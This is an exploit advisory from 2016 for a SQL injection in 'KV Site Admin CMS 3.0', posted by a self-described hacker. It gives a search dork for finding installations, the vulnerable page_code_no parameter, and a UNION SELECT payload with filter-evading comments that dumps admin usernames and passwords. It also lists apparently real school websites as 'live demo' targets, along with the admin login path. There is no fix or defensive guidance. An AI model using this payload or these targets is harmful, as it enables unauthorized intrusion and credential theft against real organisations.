##################### # Exploit Title : KV Site Admin CMS 3.0 SQL injection Vulnerability # Exploit Author : xBADGIRL21 # Dork : e.World Technology Ltd. All rights reserved "Admin Area - Version 3.0" # Version: 3.0 # MyBlog: http://xbadgirl21.blogspot.com # Tested on: [ BackBox] # skype:xbadgirl21 # Video Proof : https://youtu.be/43TuHcB_Kec # Date: 26/08/2016 ##################### # [+] DESCRIPTION : ##################### # [+] an SQL injection been Detected in KV Site Admin CMS 3.0 after you add ['] to the # [+] Vuln Target Parameter you will get error like : # [+] You have an error in your SQL syntax; check the manual that corresponds to your # [+] MySQL server version for the right syntax to use near '\'' at line 1 ##################### # [+] Poc : ##################### # [page_code_no] Get Parameter Vulnerable To SQLi #--------------------- # http://www.site.com/index-h.php?page_code_no=[SQLi] ----------------------- # http://www.kvrihandnagar.org/index-h.php?page_code_no=19' # http://www.kvrihandnagar.org/index-h.php?page_code_no=-19 /*!12345union*/ select 1,2,/*!12345group_coNcat(username,0x3a,password)*/,4 from 01_admin_detail-- ###################### # [+] Live Demo : ###################### + http://www.kvmughalsarai.org/index-h.php?page_code_no=40' + http://www.kvsrovns.org/index-h.php?page_code_no=1' ###################### # Admin Panel : http://www.site.com/kv_admin/login.php ###################### # Discovered by : xBADGIRL21 # Greetz : All Mauritanien Hackers - NoWhere #######################